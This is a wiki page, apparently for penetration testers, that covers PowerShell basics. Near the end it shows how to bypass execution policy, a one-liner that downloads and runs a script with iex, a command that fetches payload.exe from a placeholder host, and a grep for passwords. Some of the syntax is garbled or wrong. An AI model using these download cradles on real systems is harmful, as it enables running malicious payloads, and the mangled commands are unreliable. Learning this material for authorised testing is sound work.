-
Notifications
You must be signed in to change notification settings - Fork 5
PowerShell Basics
F1shh edited this page Mar 31, 2022
·
1 revision
This is a pocket guide to PowerShell for penetration testers. Advanced users will get nothing out of this.
Setting Variables:
$a = get-processRetrieving values:
$a <enter>Put conditionals inside {}
| Symbol | PowerShell |
|---|---|
| < | -lt |
| > | -gt |
| <= | -le |
| >= | -ge |
| == | -eq |
| != | -nq |
| Match String | -like |
Get-Process | Where-Object {$_.ProcessName -Like '*con*'}You can use ? to represent the output of the last command:
Get-Process | ? {$_.ProcessName -Like '*con*'}Print all elements in $a:
$a | foreach {$_}Execute a command returned by the loop use &:
$a | foreach {& $_} | select -first 5Assign var $x to each elm:
foreach ($x in $a) {$x}Create a list split by a delim
$_.split(".")Get current powershell version:
$PSVersionTableRun older version of powershell:
powershell -version <version number>Execution policy is not a security protection. It is very easily bypassed. You can run PowerShell with the -noprofile to do so. You can also change the execution policy using:
Bypass Execution policy when running script
Get-Content C:\temp\script.ps1 | powershell.exe -noprofile -Get Execution policy
Get-ExecutionPolicy -ListSet Execution policy
Set-ExecutionPolicy -Scope Powershell -nop "iex(New-Object Net.WebClient).DownloadString(`http://example.com/script.ps1`)"Powershell -c `(New-Object System.Net.WebClient).Downloadfile('http://<IP>:<port>/payload.exe','payload.exe')`Cat: Get-Content
Grep: -Select-String -pattern "password"